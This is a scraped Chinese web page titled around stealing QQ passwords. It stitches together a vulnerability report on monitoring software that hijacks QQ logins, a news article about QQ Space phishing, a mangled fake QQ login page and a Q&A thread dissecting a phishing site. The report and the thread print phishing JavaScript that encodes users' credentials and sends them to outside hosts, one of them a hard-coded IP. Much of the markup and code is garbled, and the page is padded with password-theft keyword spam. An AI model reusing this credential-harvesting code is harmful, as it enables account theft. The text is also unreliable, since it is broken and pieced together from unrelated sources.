钓鱼怎么盗取别人的qq密码人家的QQ密码

网路岗8钓鱼式盗取QQ密码(分析过程)
您当前位置: &
[ 所属分类
| 时间 2016 |
作者 红领巾 ]
网路岗8钓鱼式盗取QQ密码(分析过程)
钓鱼欺诈信息
漏洞已经通知厂商但是厂商忽略漏洞
QQ钓鱼风险,客户端安全,钓鱼欺诈,内网嗅探,漏洞分析技巧,用户敏感信息泄露,业务逻辑错误,客户端密码窃取
网路岗软件会针对安装QQ的计算机进行攻击已经严重威胁用户隐私,首先会针对QQ登陆过程进行拦截导致QQ提示“账户异常”,随后劫持/jh网站尝试盗取QQ用户密码!成功后利用QQ密码对QQ用户进行聊天记录监控!!!
劫持后的页面密码使用BASE64加密可被嗅探并解密还原:
&script language=&&&var BASE64={ enKey: 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz+/', deKey: new Array( -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, -1, -1, -1, -1, -1, -1, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1, -1, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, -1, -1, -1, -1, -1 ),
encode: function(src){ var str=new Array(); var ch1, ch2, ch3; var pos=0; while(pos+3&=src.length){ch1=src.charCodeAt(pos++);ch2=src.charCodeAt(pos++);ch3=src.charCodeAt(pos++);str.push(this.enKey.charAt(ch1&&2), this.enKey.charAt(((ch1&&4)+(ch2&&4))&0x3f));str.push(this.enKey.charAt(((ch2&&2)+(ch3&&6))&0x3f), this.enKey.charAt(ch3&0x3f)); } if(pos&src.length){ch1=src.charCodeAt(pos++);str.push(this.enKey.charAt(ch1&&2));if(pos&src.length){ ch2=src.charCodeAt(pos); str.push(this.enKey.charAt(((ch1&&4)+(ch2&&4))&0x3f)); str.push(this.enKey.charAt(ch2&&2&0x3f), '=');}else{ str.push(this.enKey.charAt(ch1&&4&0x3f), '==');} } return str.join(''); }};function paswdfield_eventchange(a, b){ var nonefm = window.document. nonefm.u.value = BASE64.encode(a.u.value); nonefm.p.value = BASE64.encode(a.p.value); nonefm.w.value = &518000&; nonefm.action = &http://211.157.108.252/s?flag=WWWSOFTBARCOMWWWSOFTBARCOM&; nonefm.target=&nonewin&; nonefm.submit();}&/script&
漏洞证明:
劫持QQ客户端
被钓鱼后密码提交包
钓鱼页面包含“&!-- saved from url=(0077)/cn/services/abnormal/abnormal_index --&” 信息可直接判断是否被替换。
修复方案:
QQ客户端升级修改关键算法防止数据包传输过程中被非法篡改。
由于网路岗使用QQ协议进行攻击,我想涉及的版本应该包含 请腾讯公司尽快升级确保用户的安全。
版权声明:转载请注明来源 New4@乌云
本文web安全相关术语:黑盒测试方法 黑盒测试和白盒测试 网站安全检测 360网站安全检测 网络安全知识 网络安全技术 网络信息安全 网络安全工程师
转载请注明本文标题:本站链接:
分享请点击:
1.凡CodeSecTeam转载的文章,均出自其它媒体或其他官网介绍,目的在于传递更多的信息,并不代表本站赞同其观点和其真实性负责;
2.转载的文章仅代表原创作者观点,与本站无关。其原创性以及文中陈述文字和内容未经本站证实,本站对该文以及其中全部或者部分内容、文字的真实性、完整性、及时性,不作出任何保证或承若;
3.如本站转载稿涉及版权等问题,请作者及时联系本站,我们会及时处理。
登录后可拥有收藏文章、关注作者等权限...
你必须要足够努力,才能让别人觉得你毫不费力。
手机客户端
,专注代码审计及安全周边编程,转载请注明出处:http://www.codesec.net
转载文章如有侵权,请邮件 admin[at]codesec.net读完这篇文章后,您心情如何?qq空间惊现钓鱼链接 每日数万账号密码被窃--百度百家
qq空间惊现钓鱼链接 每日数万账号密码被窃
分享到微信朋友圈
近日,乌云漏洞平台公布的一则漏洞显示,钓鱼网站将钓鱼链接伪装成QQ空间相册链接,在QQ空间群发、留言,引诱俊男靓女登录,以此盗取QQ账号和密码,或已导致日均过万用户的QQ账号密码泄露,有好奇心的你可要当心了!
近日,乌云漏洞平台公布的一则漏洞显示,钓鱼网站将钓鱼链接伪装成QQ空间相册链接,在QQ空间群发、留言,引诱俊男靓女登录,以此盗取QQ账号和密码,或已导致日均过万用户的QQ账号密码泄露,有好奇心的你可要当心了!
钓鱼网站"另辟蹊径" 愿者上钩
从乌云漏洞平台披露的信息得知,该钓鱼网站是通过在QQ空间留言附带钓鱼链接的形式进行传播,通过"聚会照片还没看""还记得合照么"等具有诱惑力的留言引诱QQ空间用户登录至钓鱼网站。钓鱼链接使用的是+s.做跳转,进一步混淆视听,迷惑网友。
点开留言下的钓鱼链接进入网站,看到的是一个和QQ空间极为相似的仿冒钓鱼页面。如果网友不仔细观察,很容易被欺骗,落入钓鱼陷阱。
根据白帽子对钓鱼网站的数据统计显示,每小时最少有1500以上的人次进入钓鱼网站并留下账号密码等隐私数据。也就是说,每日至少有2-3W人账号密码被泄露。QQ账号密码泄露后可能会危及到用户的其它相关账户,比如支付宝、微信等,危害极大。
众多网友难辨真假 屡遭戏耍
网络攻防,此消彼长;防范技术在进步,钓鱼手段在翻新。在浩瀚入海,无孔不入的互联网,普通网民该如何,避免个人隐私信息泄露,造成经济财产损失?安全专家指出,打击假冒钓鱼网站,需要网友、企业、政府部门的共同参与。
1、 网友需要提高网络安全意识,做到预防为主。
2、 企业要加强自身平台信息安全保护措施,保护客户和自身利益不受损害。
3、 政府部门要加强相关法律法规建设,加大打击假冒钓鱼网站、保护用户隐私信息的力度。
安全专家指出,钓鱼网站猖獗,一方面是用户防范意识薄弱以及网站缺乏可信身份展示机制;另一方面是因为用户隐私信息泄露严重,让钓鱼欺诈更容易得手。安全专家表示"诈骗者利用已知的用户信息实施针对性钓鱼是用户最难防范的诈骗类型",让用户、网民准确的识别真假网站,可有有效减少钓鱼事件的发生,比如给站点进行无法仿冒的EV可信网站认证。
是全球统一严格身份验证标准的SSL证书,只有正规单位才能通过严格的身份验证而获得此种SSL证书,所有新版浏览器都能自动识别而显示绿色地址栏,打造绿色安全通道,构建诚信安全的网络环境,促进互联网健康安全发展。而假冒钓鱼网站是绝对无法获得此类证书,从而真正有效地防止著名网站被钓鱼。
分享到微信朋友圈
在手机阅读、分享本文
还可以输入250个字
推荐文章RECOMMEND
阅读:1102
热门文章HOT NEWS
东南亚国家正大举“招商引资”,系统化的争夺中国制造的份额
百度新闻客户端
百度新闻客户端
百度新闻客户端
扫描二维码下载
订阅 "百家" 频道
观看更多百家精彩新闻钓鱼网站&盗QQ密码&图
http://ui./iperror.html?
style=6&lang=2052&appid=&daid=4&s_url=https://mail.q
</cgi-bin/login?lc=zh_CN&vm=pt&ptlang=2052&F
un=clientread&mailid=ZC0722-Uo9n6E2iQ1IvLih7PyprQ45&httpty
pe=0&ADUIN=&ADSESSION=&ADTAG=CLIE
html&&html&&head&
&meta http-equiv="X-UA-Compatible" content="IE=9"
&meta http-equiv="Content-Type"
content="text/ charset=utf-8"
&title&QQ登录提示&/title&
* {font:normal 12px/14px "Times New Roman", Times, "宋体",
margin:0;padding:0;color:#666;list-style:outline:}
img,table,tr,td{border: border-collapse:}
a:hover, a:link, a:visited, a:active
{text-decoration:color:#0478e7;outline:}
.clear{clear:font-size:0!line-height:0!}
.none{display:none!;}
.hidden{visibility:hidden!}
.noborder{border:none!}
body{background:#f6f8f9;padding-top:50}
#login_div{margin:0}
.container
{padding-top:120width:482overflow:background:url(http
://ui./style/6/images/bg.png) no-repeat center
{background:url(http://ui./style/6/images/bg.png)
no-repeat center bottom #f6f8f9;height:30clear:}
.title{height:26width:137margin:0
margin-bottom:35background:url(http://ui./s
tyle/6/images/title.png) no-repeat -137}
.bottom{width:482margin:0
text-align:color:#98a3padding:10px 0 20}
.bottom a:link,.bottom a:hover,.bottom a:visited,.bottom
{color:#adbdc8;margin:0 10}
.bottom a:hover{text-decoration:color:#0090FF;}
type="text/javascript"&
var $ = window.$ = function(id){return
document.getElementByIdx_x(id);};
&getQuery:function(n){
&var result = (window.location.search
"").match(new
RegExp("(\\? &)" n
"=([^&]*)(& $)","i"));
&return result?result[2]:"";
document.domain="qq.com";
function ptlogin2_onResize(width, height) {
&var login_wnd = $("login_div");
&if (login_wnd)&{
&login_wnd.style.width = width "px";
&login_wnd.style.height = height "px";
&login_wnd.style.visibility = "hidden";
&login_wnd.style.visibility = "visible";
function init(){
&var title = {
&2052:["left top","QQ登录提示"],
&1028:["left -26px","QQ 登入提示"],
&1033:["left bottom","QQ Sign-in"]
&var lang = $.dom.getQuery("lang");
&lang = lang?lang:2052;
&$("title").style.backgroundPosition =
title[lang][0];
&document.title = title[lang][1];
&$("login_frame").src =
(window.location.href).replace(/iperror\.html/i,"cgi-bin/login");
&body onload="init()"&
&div class="container"
id="container"&
&&div class="title"
id="title"&&/div&
style="width:372height:285padding:0;margin:0 0
0 20" id="login_div"&
&iframe scrolling="no" height="100%"
frameborder="0"
width="100%" id="login_frame" src="about:blank"
allowtransparency="yes"&
&div class="box"&
class="bottom"&&a
href="/ptui_forgetpwd"
target="_blank"&忘记
密码&/a& &a
href="/write.shtml?fid=713"
target="_blank"&意见反馈&/a&
NT.QQ.5329_.0&ADPUBNO=26349&f_url=loginerroralert
已投稿到:
以上网友发言只代表其个人观点,不代表新浪网的观点或立场。有没有一点击链接加载网页就被盗号的 QQ 账号钓鱼网站?
最近好多同学中招,点一个网站进去就被盗了。刚开始我还不信,特意点进去不改密码,凌晨果然被盗。这是什么原因呢?上次聚的相片,看看有没有你,有的话自己拿:
照片地址: (不要点!)况且我还是用手机进的……
按投票排序
查看源码:然后把其中的js美化下:然后把其中的js美化下:function GetQueryString(str) {
var LocString = String(window.document.location.href);
var rs = new RegExp("(^|)" + str + "=([^\&]*)(\&|$)", "gi").exec(LocString),
if (tmp = rs) return tmp[2];
return "Loading";
var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz+/=";
function base64decode(Str) {
var output = "";
var chr1, chr2, chr3 = "";
var enc1, enc2, enc3, enc4 = "";
var i = 0;
var base64test = /[^A-Za-z0-9+/=]/g;
if (base64test.exec(Str)) {}
Str = Str.replace(/[^A-Za-z0-9+/=]/g, "");
enc1 = keyStr.indexOf(Str.charAt(i++));
enc2 = keyStr.indexOf(Str.charAt(i++));
enc3 = keyStr.indexOf(Str.charAt(i++));
enc4 = keyStr.indexOf(Str.charAt(i++));
chr1 = (enc1 && 2) | (enc2 && 4);
chr2 = ((enc2 & 15) && 4) | (enc3 && 2);
chr3 = ((enc3 & 3) && 6) | enc4;
output = output + String.fromCharCode(chr1);
if (enc3 != 64) {
output = output + String.fromCharCode(chr2);
if (enc4 != 64) {
output = output + String.fromCharCode(chr3);
chr1 = chr2 = chr3 = "";
enc1 = enc2 = enc3 = enc4 = "";
} while (i & Str.length);
return unescape(output);
var loadurl = getFileName();
loadurl = base64decode("aHR0cDovL2hvbWUuY2hkc2dsLmNvbS8yLnBocC8/ZD0=");
var c = String(GetQueryString('c'));
loadurl = loadurl + c;
var web_title = decodeURIComponent(GetQueryString("t"));
function getFileName() {
var url = this.location.href;
var filename = url.split("/")[4] + "/" + url.split("/")[5];
return filename + '=';
var iframe_height = 1001;
function reinitIframe() {
document.title = web_title;
$('#myframe').attr('src', loadurl);
$('#myframe').css('height', iframe_height);
$(function () {
reinitIframe();
其中有个值:aHR0cDovL2hvbWUuY2hkc2dsLmNvbS8yLnBocC8/ZD0=
base64解码后是简单解释就是在当前页面嵌入了一个iframe,src是问题就出在这个链接然后里面又嵌入了一个页面然后又是一个页面里面又iframe个页面,,这个其实是一个图片背景的东西多层嵌套下来,其实最终就是一个假的腾讯教育的页面,就是盗号用,这种方式很常见但是,如果不去输入密码,是不会被盗号的,没看到漏洞利用的代码,所以只可能是楼主去输入帐号密码提交,还输入的是真实的,于是。。。你们懂的-----------------欢迎关注----------------聊聊安全、聊聊数据、聊聊业内欢迎关注我的知乎专栏:也欢迎收听我的微信公众帐号:oxsafe或者扫描下方二维码
这是一个假冒的网站,你的肯定输入自己帐号密码了~然后帐号密码被发送到黑客那去了
看我之前的答案
这种最后的防止办法就是,你输入假的密码,然后他显示登陆成功,那么必然就是盗号网站了,一般不能确定的网站,都可以用此法验证
说点题外话.....-,=在用电脑登的时候看到这么假的钓鱼时内心鄙视了一下题主,然后无聊又用手机登了,然后发现:嗯,手机的浏览器们都是显示名字的,所以除非你刻意去看否则不会发现网址的漏洞的。嗯,手机的浏览器们都是显示名字的,所以除非你刻意去看否则不会发现网址的漏洞的。所以我觉得下一阶段钓鱼网站君们应该把侧重点放在手机端,可以通过短链跳转到钓鱼页面,然后也不要太懒,页面做成响应式,那迷惑性就很强了。ps:我不知道现在的国产手机浏览器们有没有做防钓鱼的标识...如果有烦请告知....【不过这样也防不住吧?
明明是自己告诉别人密码的,不要不承认,也不要觉得神奇。不要在被提醒之后,做出一副恍然大悟的表情,这种人见的太多了。第一个故事:手机响,某人拿起来,接听。“先生你好,我是中国国立公安局网络安全支队大队吹牛组组长,我姓打,叫草稿,我们发现你利用网络银行给本拉登洗钱,请立刻把你的银行卡和密码信息全部给我们,由我们负责帮你妥善保管”“哦,好的,还是你们公安好啊,我这就把我的所有信息告诉你们,警察同志,我的取款密码是123456。”…………“警察同志,我网银被盗了!”“怎么会的?是不是你把密码给陌生人了?”“没有啊,绝对没有,太奇怪了,我电脑各种防护各种反病毒,从来没有把密码给陌生人过,只给最可靠的人”“你确定没有给过别人?”“没有,真的没有把取款给过别人,我对天发誓。真没有。”“真没有吗?”“真的没有!”“你再想想?”“肯定没有,哦对了,除了给你们警察之外,其他人我肯定没给过,就给你们警察了”分割线第二个故事:神奇的猜生日哦,太神奇了,可以把你的年龄猜出来![1]首先,挑一个数字(0-7)表示每个礼拜想出去走走的次数;[2]把这个数字乗上2;[3]然后加上5;[4]再乗以50;[5]如果你今年的生日已经过了,把得到的数加上1755;没有就加上1754[6]最后一个步骤,用这个数目减去你出生的那一年;[7]现在你会有一个三个数的数字;[8]第一位数是你一开始选择的数目(也就是每个星期你希望出去走走的次数);[9]接下来的二位数就是你的年龄,想隐瞒都不行哦90%的帐号被盗都是类似的模式。想明白这一点就不奇怪了。
冒昧问一下,你是不是自己登录上去了?
乱编账号密码。用森森的恶意让网站设计者体验无数次希望到失望后立地成佛改邪归正。
貌似自带过滤错误扣扣
你真把qq号和密码填了啊...也不看看这是仿冒的网站么...
阿信大大居然把这个问题拿出来贴了。。。一般遇到需要输入QQ帐号密码的网站,首先会刷新一下这个页面,现在用QQ做链接的基本都是能自动登录的啊,如果是网络什么错误原因没检测到,再考虑看网址再三确认,没问题才输入账号密码的。而如果一看就知道是伪造网站的话,直接输入帐号qunimade,密码一样。
已有帐号?
无法登录?
社交帐号登录}

我要回帖

更多关于 盗取qq密码教程 的文章

更多推荐

版权声明:文章内容来源于网络,版权归原作者所有,如有侵权请点击这里与我们联系,我们将及时删除。

点击添加站长微信